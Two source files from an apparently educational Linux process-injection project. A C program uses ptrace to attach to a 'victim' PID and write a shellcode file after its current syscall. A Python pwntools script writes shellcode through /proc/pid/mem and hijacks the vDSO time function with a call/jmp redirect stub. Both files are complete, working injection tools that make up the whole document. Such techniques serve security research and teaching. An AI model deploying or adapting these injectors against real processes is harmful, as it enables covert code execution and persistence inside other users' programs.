File: 01-ptrace/inject.c
/*
 * This file is part of the linux-prinj project.
 * https://gitlab.com/pgregoire/linux-prinj/
 *
 * Copyright 2022 Philippe Grégoire <git@pgregoire.xyz>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <sys/ptrace.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>


/*
 * Reads a file into @buf, settings its length in @len.
 */
static int rdfile(const char* path, unsigned char** buf, size_t* len)
{
	int e;
	int fd;
	void* t;
	struct stat st;


	if (0 > stat(path, &st)) {
		return -1;
	}

	if (0 > (fd = open(path, O_RDONLY))) {
		return -1;
	}

	if (0 != (t = malloc(st.st_size))) {
		if (st.st_size == read(fd, t, st.st_size)) {
			close(fd);
			*buf = t;
			*len = st.st_size;
			return 0;
		}
	}

	e = errno;
	free(t);
	close(fd);
	errno = e;

	return -1;
}

/*
 * Writes the @len bytes in @buf at @addr in @pid's address space.
 */
static int
wr2mem(pid_t pid, unsigned long addr, const unsigned char* buf, size_t len)
{
	size_t i;
	unsigned long v;

	for (i = 0 ; i < len ; /**/) {
		v = ((unsigned long*)buf)[i/sizeof(unsigned long)];
		printf("Writing %016llx at 0x%016llx\n", v, addr);
		if (0 != ptrace(PTRACE_POKETEXT, pid, addr, v)) {
			return -1;
		}

		i += sizeof(unsigned long);
		addr += sizeof(unsigned long);
	}

	return 0;
}

int main(int argc, const char* const* argv)
{
	pid_t pid;
	size_t len;
	unsigned char* buf;
	struct user_regs_struct regs;


	if (3 != argc) {
		fprintf(stderr, "usage: inject <shellcode.file> <victim-pid>\n");
		return 1;
	}

	if (0 != rdfile(argv[1], &buf, &len)) {
		perror("Failed to read shellcode file");
		return 1;
	}

	pid = atoi(argv[2]);

	if (0 != ptrace(PTRACE_ATTACH, pid, 0, 0)) {
		perror("Failed to attach to target process");
		return 1;
	}

	/* Wait for the process to be stopped (under our control). */
	if (pid != waitpid(pid, 0, 0)) {
		perror("Failed waiting for target process");
		return 1;
	}

	/* Get the target process's current registers. */
	if (0 != ptrace(PTRACE_GETREGS, pid, 0, &regs)) {
		perror("Failed to read registers");
		return 1;
	}

	/*
         * The victim program mainly blocks on a syscall (sleep). 
	 * syscall's opcode is 2 bytes long so overwrite the
	 * code executed on its return.
	 */
	regs.rip += 2;
	if (0 != wr2mem(pid, regs.rip, buf, len)) {
		perror("Failed to write shellcode to memory");
		return 1;
	}

	/* Let the target process execute normally. */
	if (0 != ptrace(PTRACE_DETACH, pid, 0, 0)) {
		perror("Failed to detach process");
		return 1;
	}

	return 0;
}

File: 13-procmem/inject.py
#!/usr/bin/env python3
#
# This file is part of the linux-prinj project.
# https://gitlab.com/pgregoire/linux-prinj/
#
# Copyright 2022 Philippe Grégoire <git@pgregoire.xyz>
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.
#

from pwn import *


context.log_level = 'critical'

# -------------------------------------------------------------------- #
# /proc/

def getmaps(pid):
    with open('/proc/{}/maps'.format(pid)) as fp:
        dat = fp.read()

    r = []
    for ln in [e for e in dat.split('\n') if e]:
        s = [e for e in ln.split(' ') if e]
        r += [{
          'addr': s[0],
          'from': int(s[0].split('-')[0], 16),
          'to': int(s[0].split('-')[1], 16),
          'perms': s[1],
          'offset': int(s[2], 16),
          'dev': s[3],
          'devmaj': int(s[3].split(':')[0], 16),
          'devmin': int(s[3].split(':')[1], 16),
          'inode': int(s[4]),
          'path': None if 5 == len(s) else s[5],
        }]

    return r


def proc_rdmem(pid, addr, cnt):
    with open('/proc/{}/mem'.format(pid), 'rb') as fp:
        fp.seek(addr)
        return fp.read(cnt)


def proc_wrmem(pid, addr, buf):
    with open('/proc/{}/mem'.format(pid), 'wb') as fp:
        fp.seek(addr)
        fp.write(buf)


def rdmap(pid, mp):
    return proc_rdmem(pid, mp['from'], mp['to']-mp['from'])

# -------------------------------------------------------------------- #

with open(sys.argv[1], 'rb') as fp:
    code = fp.read()
pid = int(sys.argv[2])

maps = getmaps(pid)

# Get the vDSO map and binary
for m in maps:
    if '[vdso]' == m['path']:
        vdso = m
assert(vdso)
vdsobin = rdmap(pid, m)

# Get the vvar map
for m in maps:
    if '[vvar]' == m['path']:
        vvar = m
assert(vvar)


# pwntools does not support loading ELF from bytes
with open('vdso.elf', 'wb') as fp:
    fp.write(vdsobin)
elf = ELF('vdso.elf')


# Locate vdso_time
gtod = [elf.symbols[k] for k in elf.symbols if 'vdso_time' in k][0]
gtod_addr = vdso['from'] + gtod
print('vdso_time is at offset {} (addr: {})'.format(hex(gtod), hex(gtod_addr)))


#
# time() simply reads from vvar and returns the value.
#
#   mov rax, vvar+0x80
#   mov rax, [rax+0x20]
#   ret
#
alt = b''
alt += b'\x48\xb8' + p64(vvar['from'] + 0x80)
alt += b'\x48\x8b\x40\x20'
alt += b'\xc3'

func_size = len(alt) + (8 - (len(alt) % 8))
func_addr = vdso['to'] - func_size
proc_wrmem(pid, func_addr, alt)


# Prepend the shellcode
code_size = len(code) + (8 - (len(code) % 8))
code_addr = func_addr - code_size
print('Writing shellcode @{}'.format(hex(code_addr)))
proc_wrmem(pid, code_addr, code)


#
# Redirector
#
# We now replace the target function's code with a small redirection
# shellcode. For it, we'll compute the relative offsets and complete
# the opcodes manually.
#
#     call shellcode
#     jmp altfunc
#
stub = b''
stub += b'\xe8' + p32(code_addr - gtod_addr - 5 - len(stub))
stub += b'\xe9' + p32(func_addr - gtod_addr - 5 - len(stub))

print('Writing redirection code @{}'.format(gtod_addr))
proc_wrmem(pid, gtod_addr, stub)
